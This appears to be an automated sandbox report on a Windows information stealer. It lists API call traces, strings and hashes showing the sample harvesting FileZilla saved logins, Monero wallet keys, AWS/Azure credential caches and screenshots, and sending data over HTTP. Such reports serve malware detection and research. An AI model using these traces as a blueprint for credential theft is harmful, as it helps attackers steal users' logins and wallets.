                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b3cf3eed83d0263e3d96a89bece9f7c50be6a77084f75b5537ace52049950389
                                • Instruction ID: 46068eeb295cb0143a9e8b71b5e2bbb37d90a51513b8324eecbe0da5177b0c72
                                • Opcode Fuzzy Hash: b3cf3eed83d0263e3d96a89bece9f7c50be6a77084f75b5537ace52049950389
                                • Instruction Fuzzy Hash: 3C61E1F3A087145FE3146E29EC8573AB7E5EF84320F1A493DEAC4D7380EA3858418796
                                Memory Dump Source
                                • Source File: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a23e9d9c12e646befc51719aecbac85b46722be8d913169615a6bb50b95d757d
                                • Instruction ID: a3e4f01848450db8c1480a2db9e03239ea815caac3eb388134f38e5e905a2802
                                • Opcode Fuzzy Hash: a23e9d9c12e646befc51719aecbac85b46722be8d913169615a6bb50b95d757d
                                • Instruction Fuzzy Hash: 97518AF3A182149BF30C6E3DEC95776BBD9DB54350F17063EDA89D3780D97958048286
                                Memory Dump Source
                                • Source File: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9e23f55192227c3793425ff6b55ceb6d7d095952e6bf0d0f6cfa0fabd637e2db
                                • Instruction ID: 86abdfd4c40eb22591ad33dc6ab0ef4298a80a732b927568bd26f2ea592fa525
                                • Opcode Fuzzy Hash: 9e23f55192227c3793425ff6b55ceb6d7d095952e6bf0d0f6cfa0fabd637e2db
                                • Instruction Fuzzy Hash: 7D51E4F361C6049BE308AE2DDC8577AF7DAEB98310F16463DE6C5C3740EA34A8018696
                                Memory Dump Source
                                • Source File: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EB8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EB8F9B
                                  • Part of subcall function 00EBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00EBAC82
                                  • Part of subcall function 00EBAC30: lstrcat.KERNEL32(00000000), ref: 00EBAC92
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00EBAAF6
                                  • Part of subcall function 00EAA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EAA13C
                                  • Part of subcall function 00EAA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EAA161
                                  • Part of subcall function 00EAA110: LocalAlloc.KERNEL32(00000040,?), ref: 00EAA181
                                  • Part of subcall function 00EAA110: ReadFile.KERNEL32(000000FF,?,00000000,00EA148F,00000000), ref: 00EAA1AA
                                  • Part of subcall function 00EAA110: LocalFree.KERNEL32(00EA148F), ref: 00EAA1E0
                                  • Part of subcall function 00EAA110: CloseHandle.KERNEL32(000000FF), ref: 00EAA1EA
                                  • Part of subcall function 00EB8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EB8FE2
                                • GetProcessHeap.KERNEL32(00000000,000F423F,00EC0DBF,00EC0DBE,00EC0DBB,00EC0DBA), ref: 00EB04C2
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EB04C9
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 00EB04E5
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EC0DB7), ref: 00EB04F3
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 00EB052F
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EC0DB7), ref: 00EB053D
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 00EB0579
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EC0DB7), ref: 00EB0587
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00EB05C3
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EC0DB7), ref: 00EB05D5
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EC0DB7), ref: 00EB0662
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EC0DB7), ref: 00EB067A
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EC0DB7), ref: 00EB0692
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EC0DB7), ref: 00EB06AA
                                • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00EB06C2
                                • lstrcat.KERNEL32(?,profile: null), ref: 00EB06D1
                                • lstrcat.KERNEL32(?,url: ), ref: 00EB06E0
                                • lstrcat.KERNEL32(?,00000000), ref: 00EB06F3
                                • lstrcat.KERNEL32(?,00EC1770), ref: 00EB0702
                                • lstrcat.KERNEL32(?,00000000), ref: 00EB0715
                                • lstrcat.KERNEL32(?,00EC1774), ref: 00EB0724
                                • lstrcat.KERNEL32(?,login: ), ref: 00EB0733
                                • lstrcat.KERNEL32(?,00000000), ref: 00EB0746
                                • lstrcat.KERNEL32(?,00EC1780), ref: 00EB0755
                                • lstrcat.KERNEL32(?,password: ), ref: 00EB0764
                                • lstrcat.KERNEL32(?,00000000), ref: 00EB0777
                                • lstrcat.KERNEL32(?,00EC1790), ref: 00EB0786
                                • lstrcat.KERNEL32(?,00EC1794), ref: 00EB0795
                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EC0DB7), ref: 00EB07EE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 1942843190-555421843
                                APIs
                                  • Part of subcall function 00EBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00EBAAF6
                                  • Part of subcall function 00EA4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EA4889
                                  • Part of subcall function 00EA4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EA4899
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00EA5A48
                                • StrCmpCA.SHLWAPI(?,01BFF7D0), ref: 00EA5A63
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EA5BE3
                                • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,01BFF840,00000000,?,01BFB5B0,00000000,?,00EC1B4C), ref: 00EA5EC1
                                • lstrlen.KERNEL32(00000000), ref: 00EA5ED2
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00EA5EE3
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EA5EEA
                                • lstrlen.KERNEL32(00000000), ref: 00EA5EFF
                                • lstrlen.KERNEL32(00000000), ref: 00EA5F28
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00EA5F41
                                • lstrlen.KERNEL32(00000000,?,?), ref: 00EA5F6B
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00EA5F7F
                                • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00EA5F9C
                                • InternetCloseHandle.WININET(00000000), ref: 00EA6000
                                • InternetCloseHandle.WININET(00000000), ref: 00EA600D
                                • HttpOpenRequestA.WININET(00000000,01BFF830,?,01BFF220,00000000,00000000,00400100,00000000), ref: 00EA5C48
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                  • Part of subcall function 00EBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00EBAC82
                                  • Part of subcall function 00EBAC30: lstrcat.KERNEL32(00000000), ref: 00EBAC92
                                • InternetCloseHandle.WININET(00000000), ref: 00EA6017
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 874700897-2180234286
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                  • Part of subcall function 00EB8CF0: GetSystemTime.KERNEL32(00EC0E1B,01BFB730,00EC05B6,?,?,00EA13F9,?,0000001A,00EC0E1B,00000000,?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EB8D16
                                  • Part of subcall function 00EBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00EBAC82
                                  • Part of subcall function 00EBAC30: lstrcat.KERNEL32(00000000), ref: 00EBAC92
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EAD083
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00EAD1C7
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EAD1CE
                                • lstrcat.KERNEL32(?,00000000), ref: 00EAD308
                                • lstrcat.KERNEL32(?,00EC1570), ref: 00EAD317
                                • lstrcat.KERNEL32(?,00000000), ref: 00EAD32A
                                • lstrcat.KERNEL32(?,00EC1574), ref: 00EAD339
                                • lstrcat.KERNEL32(?,00000000), ref: 00EAD34C
                                • lstrcat.KERNEL32(?,00EC1578), ref: 00EAD35B
                                • lstrcat.KERNEL32(?,00000000), ref: 00EAD36E
                                • lstrcat.KERNEL32(?,00EC157C), ref: 00EAD37D
                                • lstrcat.KERNEL32(?,00000000), ref: 00EAD390
                                • lstrcat.KERNEL32(?,00EC1580), ref: 00EAD39F
                                • lstrcat.KERNEL32(?,00000000), ref: 00EAD3B2
                                • lstrcat.KERNEL32(?,00EC1584), ref: 00EAD3C1
                                • lstrcat.KERNEL32(?,00000000), ref: 00EAD3D4
                                • lstrcat.KERNEL32(?,00EC1588), ref: 00EAD3E3
                                  • Part of subcall function 00EBAB30: lstrlen.KERNEL32(UO,?,?,00EA4F55,00EC0DDF), ref: 00EBAB3B
                                  • Part of subcall function 00EBAB30: lstrcpy.KERNEL32(00EC0DDF,00000000), ref: 00EBAB95
                                • lstrlen.KERNEL32(?), ref: 00EAD42A
                                • lstrlen.KERNEL32(?), ref: 00EAD439
                                  • Part of subcall function 00EBAD80: StrCmpCA.SHLWAPI(00000000,00EC1568,00EAD2A2,00EC1568,00000000), ref: 00EBAD9F
                                • DeleteFileA.KERNEL32(00000000), ref: 00EAD4B4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                 • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                • String ID:
                                • API String ID: 1956182324-0
                                • Opcode ID: 2d78cb46961b9db6ccd27d733949ea442c721097984b5ed4bd8b04f0e3346eb8
                                • Instruction ID: b0981c42cab75629d6f81b96a269ea2b81424afda7b240205c33aa5112660202
                                • Opcode Fuzzy Hash: 2d78cb46961b9db6ccd27d733949ea442c721097984b5ed4bd8b04f0e3346eb8
                                • Instruction Fuzzy Hash: A6E11E71910108ABCF18EBA0DD96EEF73B9AF54301F1455B8F127B6191DF31AA48CB62
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00EBAC82
                                  • Part of subcall function 00EBAC30: lstrcat.KERNEL32(00000000), ref: 00EBAC92
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,01BFE408,00000000,?,00EC1544,00000000,?,?), ref: 00EACB6C
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00EACB89
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00EACB95
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EACBA8
                                • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00EACBD9
                                • StrStrA.SHLWAPI(?,01BFE378,00EC0B56), ref: 00EACBF7
                                • StrStrA.SHLWAPI(00000000,01BFE4E0), ref: 00EACC1E
                                • StrStrA.SHLWAPI(?,01BFE620,00000000,?,00EC1550,00000000,?,00000000,00000000,?,01BF9D48,00000000,?,00EC154C,00000000,?), ref: 00EACDA2
                                • StrStrA.SHLWAPI(00000000,01BFE960), ref: 00EACDB9
                                  • Part of subcall function 00EAC920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00EAC971
                                  • Part of subcall function 00EAC920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00EAC97C
                                • StrStrA.SHLWAPI(?,01BFE960,00000000,?,00EC1554,00000000,?,00000000,01BF9E58), ref: 00EACE5A
                                • StrStrA.SHLWAPI(00000000,01BF9F38), ref: 00EACE71
                                  • Part of subcall function 00EAC920: lstrcat.KERNEL32(?,00EC0B47), ref: 00EACA43
                                  • Part of subcall function 00EAC920: lstrcat.KERNEL32(?,00EC0B4B), ref: 00EACA57
                                  • Part of subcall function 00EAC920: lstrcat.KERNEL32(?,00EC0B4E), ref: 00EACA78
                                • lstrlen.KERNEL32(00000000), ref: 00EACF44
                                • CloseHandle.KERNEL32(00000000), ref: 00EACF9C
                                Similarity
                                • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                • String ID:
                                • API String ID: 3744635739-3916222277
                                • Opcode ID: d3529ebbdd51fbcf344bcee94f3eb4165767975e368291b2b3f8f529c21d98ab
                                • Instruction ID: 3f003288d0440d76264c2ebc406583a6959adc6307889de340d115c697d09c4e
                                • Opcode Fuzzy Hash: d3529ebbdd51fbcf344bcee94f3eb4165767975e368291b2b3f8f529c21d98ab
                                • Instruction Fuzzy Hash: F8E1E771910108ABCF18EBA4DDA6FEFB7B9AF14300F4451B9F11676191EE306A89CF61
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                • RegOpenKeyExA.ADVAPI32(00000000,01BFC4C8,00000000,00020019,00000000,00EC05BE), ref: 00EB8534
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00EB85B6
                                • wsprintfA.USER32 ref: 00EB85E9
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00EB860B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00EB861C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00EB8629
                                  • Part of subcall function 00EBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00EBAAF6
                                Similarity
                                • API ID: CloseOpenlstrcpy$Enumwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 3246050789-3278919252
                                • Opcode ID: 12def01459e266ffa55aa1b32fc92e4dea5ce9a827336e1f253dafaa6df8ab5f
                                • Instruction ID: 43d0484471bddf9d2b316c68b97252f63d04772b37d53f1420629f9f5dcdcd8b
                                • Opcode Fuzzy Hash: 12def01459e266ffa55aa1b32fc92e4dea5ce9a827336e1f253dafaa6df8ab5f
                                • Instruction Fuzzy Hash: 17810B71911118ABDB28DB54CD95FEAB7B8BF48704F1492E9E119B6280DF706F84CFA0
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00EB91FC
                                Similarity
                                • API ID: CreateGlobalStream
                                • String ID: `d$`d$image/jpeg
                                • API String ID: 2244384528-3402243820
                                • Opcode ID: 647e95faa5f57377e68cb28d3000940deef02f3f59dbe951a209f139e508d5d5
                                • Instruction ID: e76a9d72b8ae9767978935b09556d5adab06d60b1e7acd5346c07fbe703c993a
                                • Opcode Fuzzy Hash: 647e95faa5f57377e68cb28d3000940deef02f3f59dbe951a209f139e508d5d5
                                • Instruction Fuzzy Hash: 0971F175910208ABDB14DFE4DC89FDEB7B9BF48300F108558F625B7294DB34A944CB60
                                APIs
                                  • Part of subcall function 00EB8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EB8F9B
                                • lstrcat.KERNEL32(?,00000000), ref: 00EB5000
                                • lstrcat.KERNEL32(?,\.azure\), ref: 00EB501D
                                  • Part of subcall function 00EB4B60: wsprintfA.USER32 ref: 00EB4B7C
                                  • Part of subcall function 00EB4B60: FindFirstFileA.KERNEL32(?,?), ref: 00EB4B93
                                • lstrcat.KERNEL32(?,00000000), ref: 00EB508C
                                • lstrcat.KERNEL32(?,\.aws\), ref: 00EB50A9
                                  • Part of subcall function 00EB4B60: StrCmpCA.SHLWAPI(?,00EC0FC4), ref: 00EB4BC1
                                  • Part of subcall function 00EB4B60: StrCmpCA.SHLWAPI(?,00EC0FC8), ref: 00EB4BD7
                                  • Part of subcall function 00EB4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00EB4DCD
                                  • Part of subcall function 00EB4B60: FindClose.KERNEL32(000000FF), ref: 00EB4DE2
                                • lstrcat.KERNEL32(?,00000000), ref: 00EB5118
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00EB5135
                                  • Part of subcall function 00EB4B60: wsprintfA.USER32 ref: 00EB4C00
                                  • Part of subcall function 00EB4B60: StrCmpCA.SHLWAPI(?,00EC08D3), ref: 00EB4C15
                                  • Part of subcall function 00EB4B60: wsprintfA.USER32 ref: 00EB4C32
                                  • Part of subcall function 00EB4B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00EB4C6E
                                  • Part of subcall function 00EB4B60: lstrcat.KERNEL32(?,01BFF750), ref: 00EB4C9A
                                  • Part of subcall function 00EB4B60: lstrcat.KERNEL32(?,00EC0FE0), ref: 00EB4CAC
                                  • Part of subcall function 00EB4B60: lstrcat.KERNEL32(?,?), ref: 00EB4CC0
                                  • Part of subcall function 00EB4B60: lstrcat.KERNEL32(?,00EC0FE4), ref: 00EB4CD2
                                  • Part of subcall function 00EB4B60: lstrcat.KERNEL32(?,?), ref: 00EB4CE6
                                  • Part of subcall function 00EB4B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00EB4CFC
                                  • Part of subcall function 00EB4B60: DeleteFileA.KERNEL32(?), ref: 00EB4D81
                                Similarity
                                • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 949356159-974132213
                                • Opcode ID: 0c3f7e583821b424cc5a5eb138238ce47ba36deb2170b03a584f687e5923be2a
                                • Instruction ID: 5e8d2616522867eeabf728b959d373fa7c9007fcb44876a6acf1036a7d65aa3f
                                • Opcode Fuzzy Hash: 0c3f7e583821b424cc5a5eb138238ce47ba36deb2170b03a584f687e5923be2a
                                • Instruction Fuzzy Hash: B541F8BAA4030867DF24E770ED87FDD73785B55700F0054A8B255751C2EEB5A7C88B92
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00EB3415
